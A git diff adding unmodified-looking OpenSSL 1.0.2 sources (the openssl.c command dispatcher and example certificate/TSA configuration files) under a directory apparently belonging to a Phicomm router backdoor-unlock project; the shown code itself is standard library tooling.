+keyUsage = nonRepudiation, digitalSignature, keyEncipherment
+
+[ v3_ca ]
+
+
+# Extensions for a typical CA
+
+
+# PKIX recommendation.
+
+subjectKeyIdentifier=hash
+
+authorityKeyIdentifier=keyid:always,issuer
+
+# This is what PKIX recommends but some broken software chokes on critical
+# extensions.
+#basicConstraints = critical,CA:true
+# So we do this instead.
+basicConstraints = CA:true
+
+# Key usage: this is typical for a CA certificate. However since it will
+# prevent it being used as an test self-signed certificate it is best
+# left out by default.
+# keyUsage = cRLSign, keyCertSign
+
+# Some might want this also
+# nsCertType = sslCA, emailCA
+
+# Include email address in subject alt name: another PKIX recommendation
+# subjectAltName=email:copy
+# Copy issuer details
+# issuerAltName=issuer:copy
+
+# DER hex encoding of an extension: beware experts only!
+# obj=DER:02:03
+# Where 'obj' is a standard or added object
+# You can even override a supported extension:
+# basicConstraints= critical, DER:30:03:01:01:FF
+
+[ crl_ext ]
+
+# CRL extensions.
+# Only issuerAltName and authorityKeyIdentifier make any sense in a CRL.
+
+# issuerAltName=issuer:copy
+authorityKeyIdentifier=keyid:always
+
+[ proxy_cert_ext ]
+# These extensions should be added when creating a proxy certificate
+
+# This goes against PKIX guidelines but some CAs do it and some software
+# requires this to avoid interpreting an end user certificate as a CA.
+
+basicConstraints=CA:FALSE
+
+# Here are some examples of the usage of nsCertType. If it is omitted
+# the certificate can be used for anything *except* object signing.
+
+# This is OK for an SSL server.
+# nsCertType			= server
+
+# For an object signing certificate this would be used.
+# nsCertType = objsign
+
+# For normal client use this is typical
+# nsCertType = client, email
+
+# and for everything including object signing:
+# nsCertType = client, email, objsign
+
+# This is typical in keyUsage for a client certificate.
+# keyUsage = nonRepudiation, digitalSignature, keyEncipherment
+
+# This will be displayed in Netscape's comment listbox.
+nsComment			= "OpenSSL Generated Certificate"
+
+# PKIX recommendations harmless if included in all certificates.
+subjectKeyIdentifier=hash
+authorityKeyIdentifier=keyid,issuer
+
+# This stuff is for subjectAltName and issuerAltname.
+# Import the email address.
+# subjectAltName=email:copy
+# An alternative to produce certificates that aren't
+# deprecated according to PKIX.
+# subjectAltName=email:move
+
+# Copy subject details
+# issuerAltName=issuer:copy
+
+#nsCaRevocationUrl		= http://www.domain.dom/ca-crl.pem
+#nsBaseUrl
+#nsRevocationUrl
+#nsRenewalUrl
+#nsCaPolicyUrl
+#nsSslServerName
+
+# This really needs to be in place for it to be a proxy certificate.
+proxyCertInfo=critical,language:id-ppl-anyLanguage,pathlen:3,policy:foo
+
+####################################################################
+[ tsa ]
+
+default_tsa = tsa_config1	# the default TSA section
+
+[ tsa_config1 ]
+
+# These are used by the TSA reply generation only.
+dir		= sys\$disk:[.demoCA		# TSA root directory
+serial		= $dir]tsaserial.	# The current serial number (mandatory)
+crypto_device	= builtin		# OpenSSL engine to use for signing
+signer_cert	= $dir/tsacert.pem 	# The TSA signing certificate
+					# (optional)
+certs		= $dir.cacert.pem]	# Certificate chain to include in reply
+					# (optional)
+signer_key	= $dir/private/tsakey.pem # The TSA private key (optional)
+
+default_policy	= tsa_policy1		# Policy if request did not specify it
+					# (optional)
+other_policies	= tsa_policy2, tsa_policy3	# acceptable policies (optional)
+digests		= md5, sha1		# Acceptable message digests (mandatory)
+accuracy	= secs:1, millisecs:500, microsecs:100	# (optional)
+clock_precision_digits  = 0	# number of digits after dot. (optional)
+ordering		= yes	# Is ordering defined for timestamps?
+				# (optional, default: no)
+tsa_name		= yes	# Must the TSA name be included in the reply?
+				# (optional, default: no)
+ess_cert_id_chain	= no	# Must the ESS cert id chain be included?
+				# (optional, default: no)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.c
new file mode 100644
index 0000000..112ed7e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.c
@@ -0,0 +1,696 @@
+/* apps/openssl.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <stdlib.h>
+#define OPENSSL_C               /* tells apps.h to use complete
+                                 * apps_startup() */
+#include "apps.h"
+#include <openssl/bio.h>
+#include <openssl/crypto.h>
+#include <openssl/rand.h>
+#include <openssl/lhash.h>
+#include <openssl/conf.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/ssl.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#define USE_SOCKETS             /* needed for the _O_BINARY defs in the MS
+                                 * world */
+#include "progs.h"
+#include "s_apps.h"
+#include <openssl/err.h>
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+/*
+ * The LHASH callbacks ("hash" & "cmp") have been replaced by functions with
+ * the base prototypes (we cast each variable inside the function to the
+ * required type of "FUNCTION*"). This removes the necessity for
+ * macro-generated wrapper functions.
+ */
+
+static LHASH_OF(FUNCTION) *prog_init(void);
+static int do_cmd(LHASH_OF(FUNCTION) *prog, int argc, char *argv[]);
+static void list_pkey(BIO *out);
+static void list_cipher(BIO *out);
+static void list_md(BIO *out);
+char *default_config_file = NULL;
+
+/* Make sure there is only one when MONOLITH is defined */
+#ifdef MONOLITH
+CONF *config = NULL;
+BIO *bio_err = NULL;
+#endif
+
+static void lock_dbg_cb(int mode, int type, const char *file, int line)
+{
+    static int modes[CRYPTO_NUM_LOCKS]; /* = {0, 0, ... } */
+    const char *errstr = NULL;
+    int rw;
+
+    rw = mode & (CRYPTO_READ | CRYPTO_WRITE);
+    if (!((rw == CRYPTO_READ) || (rw == CRYPTO_WRITE))) {
+        errstr = "invalid mode";
+        goto err;
+    }
+
+    if (type < 0 || type >= CRYPTO_NUM_LOCKS) {
+        errstr = "type out of bounds";
+        goto err;
+    }
+
+    if (mode & CRYPTO_LOCK) {
+        if (modes[type]) {
+            errstr = "already locked";
+            /*
+             * must not happen in a single-threaded program (would deadlock)
+             */
+            goto err;
+        }
+
+        modes[type] = rw;
+    } else if (mode & CRYPTO_UNLOCK) {
+        if (!modes[type]) {
+            errstr = "not locked";
+            goto err;
+        }
+
+        if (modes[type] != rw) {
+            errstr = (rw == CRYPTO_READ) ?
+                "CRYPTO_r_unlock on write lock" :
+                "CRYPTO_w_unlock on read lock";
+        }
+
+        modes[type] = 0;
+    } else {
+        errstr = "invalid mode";
+        goto err;
+    }
+
+ err:
+    if (errstr) {
+        /* we cannot use bio_err here */
+        fprintf(stderr,
+                "openssl (lock_dbg_cb): %s (mode=%d, type=%d) at %s:%d\n",
+                errstr, mode, type, file, line);
+    }
+}
+
+#if defined( OPENSSL_SYS_VMS) && (__INITIAL_POINTER_SIZE == 64)
+# define ARGV _Argv
+#else
+# define ARGV Argv
+#endif
+
+int main(int Argc, char *ARGV[])
+{
+    ARGS arg;
+#define PROG_NAME_SIZE  39
+    char pname[PROG_NAME_SIZE + 1];
+    FUNCTION f, *fp;
+    MS_STATIC const char *prompt;
+    MS_STATIC char buf[1024];
+    char *to_free = NULL;
+    int n, i, ret = 0;
+    int argc;
+    char **argv, *p;
+    LHASH_OF(FUNCTION) *prog = NULL;
+    long errline;
+
+#if defined( OPENSSL_SYS_VMS) && (__INITIAL_POINTER_SIZE == 64)
+    /*-
+     * 2011-03-22 SMS.
+     * If we have 32-bit pointers everywhere, then we're safe, and
+     * we bypass this mess, as on non-VMS systems.  (See ARGV,
+     * above.)
+     * Problem 1: Compaq/HP C before V7.3 always used 32-bit
+     * pointers for argv[].
+     * Fix 1: For a 32-bit argv[], when we're using 64-bit pointers
+     * everywhere else, we always allocate and use a 64-bit
+     * duplicate of argv[].
+     * Problem 2: Compaq/HP C V7.3 (Alpha, IA64) before ECO1 failed
+     * to NULL-terminate a 64-bit argv[].  (As this was written, the
+     * compiler ECO was available only on IA64.)
+     * Fix 2: Unless advised not to (VMS_TRUST_ARGV), we test a
+     * 64-bit argv[argc] for NULL, and, if necessary, use a
+     * (properly) NULL-terminated (64-bit) duplicate of argv[].
+     * The same code is used in either case to duplicate argv[].
+     * Some of these decisions could be handled in preprocessing,
+     * but the code tends to get even uglier, and the penalty for
+     * deciding at compile- or run-time is tiny.
+     */
+    char **Argv = NULL;
+    int free_Argv = 0;
+
+    if ((sizeof(_Argv) < 8)     /* 32-bit argv[]. */
+# if !defined( VMS_TRUST_ARGV)
+        || (_Argv[Argc] != NULL) /* Untrusted argv[argc] not NULL. */
+# endif
+        ) {
+        int i;
+        Argv = OPENSSL_malloc((Argc + 1) * sizeof(char *));
+        if (Argv == NULL) {
+            ret = -1;
+            goto end;
+        }
+        for (i = 0; i < Argc; i++)
+            Argv[i] = _Argv[i];
+        Argv[Argc] = NULL;      /* Certain NULL termination. */
+        free_Argv = 1;
+    } else {
+        /*
+         * Use the known-good 32-bit argv[] (which needs the type cast to
+         * satisfy the compiler), or the trusted or tested-good 64-bit argv[]
+         * as-is.
+         */
+        Argv = (char **)_Argv;
+    }
+#endif                          /* defined( OPENSSL_SYS_VMS) &&
+                                 * (__INITIAL_POINTER_SIZE == 64) */
+
+    arg.data = NULL;
+    arg.count = 0;
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (getenv("OPENSSL_DEBUG_MEMORY") != NULL) { /* if not defined, use
+                                                   * compiled-in library
+                                                   * defaults */
+        if (!(0 == strcmp(getenv("OPENSSL_DEBUG_MEMORY"), "off"))) {
+            CRYPTO_malloc_debug_init();
+            CRYPTO_set_mem_debug_options(V_CRYPTO_MDEBUG_ALL);
+        } else {
+            /* OPENSSL_DEBUG_MEMORY=off */
+            CRYPTO_set_mem_debug_functions(0, 0, 0, 0, 0);
+        }
+    }
+    CRYPTO_mem_ctrl(CRYPTO_MEM_CHECK_ON);
+
+#if 0
+    if (getenv("OPENSSL_DEBUG_LOCKING") != NULL)
+#endif
+    {
+        CRYPTO_set_locking_callback(lock_dbg_cb);
+    }
+
+    if (getenv("OPENSSL_FIPS")) {
+#ifdef OPENSSL_FIPS
+        if (!FIPS_mode_set(1)) {
+            ERR_load_crypto_strings();
+            ERR_print_errors(BIO_new_fp(stderr, BIO_NOCLOSE));
+            EXIT(1);
+        }
+#else
+        fprintf(stderr, "FIPS mode not supported.\n");
+        EXIT(1);
+#endif
+    }
+
+    apps_startup();
+
+    /* Lets load up our environment a little */
+    p = getenv("OPENSSL_CONF");
+    if (p == NULL)
+        p = getenv("SSLEAY_CONF");
+    if (p == NULL)
+        p = to_free = make_config_name();
+
+    default_config_file = p;
+
+    config = NCONF_new(NULL);
+    i = NCONF_load(config, p, &errline);
+    if (i == 0) {
+        if (ERR_GET_REASON(ERR_peek_last_error())
+            == CONF_R_NO_SUCH_FILE) {
+            BIO_printf(bio_err, "WARNING: can't open config file: %s\n", p);
+            ERR_clear_error();
+            NCONF_free(config);
+            config = NULL;
+        } else {
+            ERR_print_errors(bio_err);
+            NCONF_free(config);
+            exit(1);
+        }
+    }
+
+    prog = prog_init();
+
+    /* first check the program name */
+    program_name(Argv[0], pname, sizeof pname);
+
+    f.name = pname;
+    fp = lh_FUNCTION_retrieve(prog, &f);
+    if (fp != NULL) {
+        Argv[0] = pname;
+        ret = fp->func(Argc, Argv);
+        goto end;
+    }
+
+    /*
+     * ok, now check that there are not arguments, if there are, run with
+     * them, shifting the ssleay off the front
+     */
+    if (Argc != 1) {
+        Argc--;
+        Argv++;
+        ret = do_cmd(prog, Argc, Argv);
+        if (ret < 0)
+            ret = 0;
+        goto end;
+    }
+
+    /* ok, lets enter the old 'OpenSSL>' mode */
+
+    for (;;) {
+        ret = 0;
+        p = buf;
+        n = sizeof buf;
+        i = 0;
+        for (;;) {
+            p[0] = '\0';
+            if (i++)
+                prompt = ">";
+            else
+                prompt = "OpenSSL> ";
+            fputs(prompt, stdout);
+            fflush(stdout);
+            if (!fgets(p, n, stdin))
+                goto end;
+            if (p[0] == '\0')
+                goto end;
+            i = strlen(p);
+            if (i <= 1)
+                break;
+            if (p[i - 2] != '\\')
+                break;
+            i -= 2;
+            p += i;
+            n -= i;
+        }
+        if (!chopup_args(&arg, buf, &argc, &argv))
+            break;
+
+        ret = do_cmd(prog, argc, argv);
+        if (ret < 0) {
+            ret = 0;
+            goto end;
+        }
+        if (ret != 0)
+            BIO_printf(bio_err, "error in %s\n", argv[0]);
+        (void)BIO_flush(bio_err);
+    }
+    BIO_printf(bio_err, "bad exit\n");
+    ret = 1;
+ end:
+    if (to_free)
+        OPENSSL_free(to_free);
+    if (config != NULL) {
+        NCONF_free(config);
+        config = NULL;
+    }
+    if (prog != NULL)
+        lh_FUNCTION_free(prog);
+    if (arg.data != NULL)
+        OPENSSL_free(arg.data);
+
+    if (bio_err != NULL) {
+        BIO_free(bio_err);
+        bio_err = NULL;
+    }
+#if defined( OPENSSL_SYS_VMS) && (__INITIAL_POINTER_SIZE == 64)
+    /* Free any duplicate Argv[] storage. */
+    if (free_Argv) {
+        OPENSSL_free(Argv);
+    }
+#endif
+    apps_shutdown();
+    CRYPTO_mem_leaks(bio_err);
+
+    OPENSSL_EXIT(ret);
+}
+
+#define LIST_STANDARD_COMMANDS "list-standard-commands"
+#define LIST_MESSAGE_DIGEST_COMMANDS "list-message-digest-commands"
+#define LIST_MESSAGE_DIGEST_ALGORITHMS "list-message-digest-algorithms"
+#define LIST_CIPHER_COMMANDS "list-cipher-commands"
+#define LIST_CIPHER_ALGORITHMS "list-cipher-algorithms"
+#define LIST_PUBLIC_KEY_ALGORITHMS "list-public-key-algorithms"
+
+static int do_cmd(LHASH_OF(FUNCTION) *prog, int argc, char *argv[])
+{
+    FUNCTION f, *fp;
+    int i, ret = 1, tp, nl;
+
+    if ((argc <= 0) || (argv[0] == NULL)) {
+        ret = 0;
+        goto end;
+    }
+    f.name = argv[0];
+    fp = lh_FUNCTION_retrieve(prog, &f);
+    if (fp == NULL) {
+        if (EVP_get_digestbyname(argv[0])) {
+            f.type = FUNC_TYPE_MD;
+            f.func = dgst_main;
+            fp = &f;
+        } else if (EVP_get_cipherbyname(argv[0])) {
+            f.type = FUNC_TYPE_CIPHER;
+            f.func = enc_main;
+            fp = &f;
+        }
+    }
+    if (fp != NULL) {
+        ret = fp->func(argc, argv);
+    } else if ((strncmp(argv[0], "no-", 3)) == 0) {
+        BIO *bio_stdout = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            bio_stdout = BIO_push(tmpbio, bio_stdout);
+        }
+#endif
+        f.name = argv[0] + 3;
+        ret = (lh_FUNCTION_retrieve(prog, &f) != NULL);
+        if (!ret)
+            BIO_printf(bio_stdout, "%s\n", argv[0]);
+        else
+            BIO_printf(bio_stdout, "%s\n", argv[0] + 3);
+        BIO_free_all(bio_stdout);
+        goto end;
+    } else if ((strcmp(argv[0], "quit") == 0) ||
+               (strcmp(argv[0], "q") == 0) ||
+               (strcmp(argv[0], "exit") == 0) ||
+               (strcmp(argv[0], "bye") == 0)) {
+        ret = -1;
+        goto end;
+    } else if ((strcmp(argv[0], LIST_STANDARD_COMMANDS) == 0) ||
+               (strcmp(argv[0], LIST_MESSAGE_DIGEST_COMMANDS) == 0) ||
+               (strcmp(argv[0], LIST_MESSAGE_DIGEST_ALGORITHMS) == 0) ||
+               (strcmp(argv[0], LIST_CIPHER_COMMANDS) == 0) ||
+               (strcmp(argv[0], LIST_CIPHER_ALGORITHMS) == 0) ||
+               (strcmp(argv[0], LIST_PUBLIC_KEY_ALGORITHMS) == 0)) {
+        int list_type;
+        BIO *bio_stdout;
+
+        if (strcmp(argv[0], LIST_STANDARD_COMMANDS) == 0)
+            list_type = FUNC_TYPE_GENERAL;
+        else if (strcmp(argv[0], LIST_MESSAGE_DIGEST_COMMANDS) == 0)
+            list_type = FUNC_TYPE_MD;
+        else if (strcmp(argv[0], LIST_MESSAGE_DIGEST_ALGORITHMS) == 0)
+            list_type = FUNC_TYPE_MD_ALG;
+        else if (strcmp(argv[0], LIST_PUBLIC_KEY_ALGORITHMS) == 0)
+            list_type = FUNC_TYPE_PKEY;
+        else if (strcmp(argv[0], LIST_CIPHER_ALGORITHMS) == 0)
+            list_type = FUNC_TYPE_CIPHER_ALG;
+        else                    /* strcmp(argv[0],LIST_CIPHER_COMMANDS) == 0 */
+            list_type = FUNC_TYPE_CIPHER;
+        bio_stdout = BIO_new_fp(stdout, BIO_NOCLOSE);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            bio_stdout = BIO_push(tmpbio, bio_stdout);
+        }
+#endif
+
+        if (!load_config(bio_err, NULL))
+            goto end;
+
+        if (list_type == FUNC_TYPE_PKEY)
+            list_pkey(bio_stdout);
+        if (list_type == FUNC_TYPE_MD_ALG)
+            list_md(bio_stdout);
+        if (list_type == FUNC_TYPE_CIPHER_ALG)
+            list_cipher(bio_stdout);
+        else {
+            for (fp = functions; fp->name != NULL; fp++)
+                if (fp->type == list_type)
+                    BIO_printf(bio_stdout, "%s\n", fp->name);
+        }
+        BIO_free_all(bio_stdout);
+        ret = 0;
+        goto end;
+    } else {
+        BIO_printf(bio_err, "openssl:Error: '%s' is an invalid command.\n",
+                   argv[0]);
+        BIO_printf(bio_err, "\nStandard commands");
+        i = 0;
+        tp = 0;
+        for (fp = functions; fp->name != NULL; fp++) {
+            nl = 0;
+#ifdef OPENSSL_NO_CAMELLIA
+            if (((i++) % 5) == 0)
+#else
+            if (((i++) % 4) == 0)
+#endif
+            {
+                BIO_printf(bio_err, "\n");
+                nl = 1;
+            }
+            if (fp->type != tp) {
+                tp = fp->type;
+                if (!nl)
+                    BIO_printf(bio_err, "\n");
+                if (tp == FUNC_TYPE_MD) {
+                    i = 1;
+                    BIO_printf(bio_err,
+                               "\nMessage Digest commands (see the `dgst' command for more details)\n");
+                } else if (tp == FUNC_TYPE_CIPHER) {
+                    i = 1;
+                    BIO_printf(bio_err,
+                               "\nCipher commands (see the `enc' command for more details)\n");
+                }
+            }
+#ifdef OPENSSL_NO_CAMELLIA
+            BIO_printf(bio_err, "%-15s", fp->name);
+#else
+            BIO_printf(bio_err, "%-18s", fp->name);
+#endif
+        }
+        BIO_printf(bio_err, "\n\n");
+        ret = 0;
+    }
+ end:
+    return (ret);
+}
+
+static int SortFnByName(const void *_f1, const void *_f2)
+{
+    const FUNCTION *f1 = _f1;
+    const FUNCTION *f2 = _f2;
+
+    if (f1->type != f2->type)
+        return f1->type - f2->type;
+    return strcmp(f1->name, f2->name);
+}
+
+static void list_pkey(BIO *out)
+{
+    int i;
+    for (i = 0; i < EVP_PKEY_asn1_get_count(); i++) {
+        const EVP_PKEY_ASN1_METHOD *ameth;
+        int pkey_id, pkey_base_id, pkey_flags;
+        const char *pinfo, *pem_str;
+        ameth = EVP_PKEY_asn1_get0(i);
+        EVP_PKEY_asn1_get0_info(&pkey_id, &pkey_base_id, &pkey_flags,
+                                &pinfo, &pem_str, ameth);
+        if (pkey_flags & ASN1_PKEY_ALIAS) {
+            BIO_printf(out, "Name: %s\n", OBJ_nid2ln(pkey_id));
+            BIO_printf(out, "\tType: Alias to %s\n",
+                       OBJ_nid2ln(pkey_base_id));
+        } else {
+            BIO_printf(out, "Name: %s\n", pinfo);
+            BIO_printf(out, "\tType: %s Algorithm\n",
+                       pkey_flags & ASN1_PKEY_DYNAMIC ?
+                       "External" : "Builtin");
+            BIO_printf(out, "\tOID: %s\n", OBJ_nid2ln(pkey_id));
+            if (pem_str == NULL)
+                pem_str = "(none)";
+            BIO_printf(out, "\tPEM string: %s\n", pem_str);
+        }
+
+    }
+}
+
+static void list_cipher_fn(const EVP_CIPHER *c,
+                           const char *from, const char *to, void *arg)
+{
+    if (c)
+        BIO_printf(arg, "%s\n", EVP_CIPHER_name(c));
+    else {
+        if (!from)
+            from = "<undefined>";
+        if (!to)
+            to = "<undefined>";
+        BIO_printf(arg, "%s => %s\n", from, to);
+    }
+}
+
+static void list_cipher(BIO *out)
+{
+    EVP_CIPHER_do_all_sorted(list_cipher_fn, out);
+}
+
+static void list_md_fn(const EVP_MD *m,
+                       const char *from, const char *to, void *arg)
+{
+    if (m)
+        BIO_printf(arg, "%s\n", EVP_MD_name(m));
+    else {
+        if (!from)
+            from = "<undefined>";
+        if (!to)
+            to = "<undefined>";
+        BIO_printf(arg, "%s => %s\n", from, to);
+    }
+}
+
+static void list_md(BIO *out)
+{
+    EVP_MD_do_all_sorted(list_md_fn, out);
+}
+
+static int MS_CALLBACK function_cmp(const FUNCTION * a, const FUNCTION * b)
+{
+    return strncmp(a->name, b->name, 8);
+}
+
+static IMPLEMENT_LHASH_COMP_FN(function, FUNCTION)
+
+static unsigned long MS_CALLBACK function_hash(const FUNCTION * a)
+{
+    return lh_strhash(a->name);
+}
+
+static IMPLEMENT_LHASH_HASH_FN(function, FUNCTION)
+
+static LHASH_OF(FUNCTION) *prog_init(void)
+{
+    LHASH_OF(FUNCTION) *ret;
+    FUNCTION *f;
+    size_t i;
+
+    /* Purely so it looks nice when the user hits ? */
+    for (i = 0, f = functions; f->name != NULL; ++f, ++i) ;
+    qsort(functions, i, sizeof *functions, SortFnByName);
+
+    if ((ret = lh_FUNCTION_new()) == NULL)
+        return (NULL);
+
+    for (f = functions; f->name != NULL; f++)
+        (void)lh_FUNCTION_insert(ret, f);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.cnf b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.cnf
new file mode 100644
index 0000000..1eb86c4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/openssl.cnf
@@ -0,0 +1,350 @@
+#
+# OpenSSL example configuration file.
+# This is mostly being used for generation of certificate requests.
+#
+
+# This definition stops the following lines choking if HOME isn't
+# defined.
+HOME			= .
+RANDFILE		= $ENV::HOME/.rnd
+
+# Extra OBJECT IDENTIFIER info:
+#oid_file		= $ENV::HOME/.oid
+oid_section		= new_oids
+
+# To use this configuration file with the "-extfile" option of the
+# "openssl x509" utility, name here the section containing the
+# X.509v3 extensions to use:
+# extensions		= 
+# (Alternatively, use a configuration file that has only
+# X.509v3 extensions in its main [= default] section.)
+
+[ new_oids ]
+
+# We can add new OIDs in here for use by 'ca', 'req' and 'ts'.
+# Add a simple OID like this:
+# testoid1=1.2.3.4
+# Or use config file substitution like this:
+# testoid2=${testoid1}.5.6
+
+# Policies used by the TSA examples.
+tsa_policy1 = 1.2.3.4.1
+tsa_policy2 = 1.2.3.4.5.6
+tsa_policy3 = 1.2.3.4.5.7
+
+####################################################################
+[ ca ]
+default_ca	= CA_default		# The default ca section
+
+####################################################################
+[ CA_default ]
+
+dir		= ./demoCA		# Where everything is kept
+certs		= $dir/certs		# Where the issued certs are kept
+crl_dir		= $dir/crl		# Where the issued crl are kept
+database	= $dir/index.txt	# database index file.
+#unique_subject	= no			# Set to 'no' to allow creation of
+					# several ctificates with same subject.
+new_certs_dir	= $dir/newcerts		# default place for new certs.
+
+certificate	= $dir/cacert.pem 	# The CA certificate
+serial		= $dir/serial 		# The current serial number
+crlnumber	= $dir/crlnumber	# the current crl number
+					# must be commented out to leave a V1 CRL
+crl		= $dir/crl.pem 		# The current CRL
+private_key	= $dir/private/cakey.pem# The private key
+RANDFILE	= $dir/private/.rand	# private random number file
+
+x509_extensions	= usr_cert		# The extentions to add to the cert
+
+# Comment out the following two lines for the "traditional"
+# (and highly broken) format.
+name_opt 	= ca_default		# Subject Name options
+cert_opt 	= ca_default		# Certificate field options
+
+# Extension copying option: use with caution.
+# copy_extensions = copy
+
+# Extensions to add to a CRL. Note: Netscape communicator chokes on V2 CRLs
+# so this is commented out by default to leave a V1 CRL.
+# crlnumber must also be commented out to leave a V1 CRL.
+# crl_extensions	= crl_ext
+
+default_days	= 365			# how long to certify for
+default_crl_days= 30			# how long before next CRL
+default_md	= default		# use public key default MD
+preserve	= no			# keep passed DN ordering
+
+# A few difference way of specifying how similar the request should look
+# For type CA, the listed attributes must be the same, and the optional
+# and supplied fields are just that :-)
+policy		= policy_match
+
+# For the CA policy
+[ policy_match ]
+countryName		= match
+stateOrProvinceName	= match
+organizationName	= match
+organizationalUnitName	= optional
+commonName		= supplied
+emailAddress		= optional
+
+# For the 'anything' policy
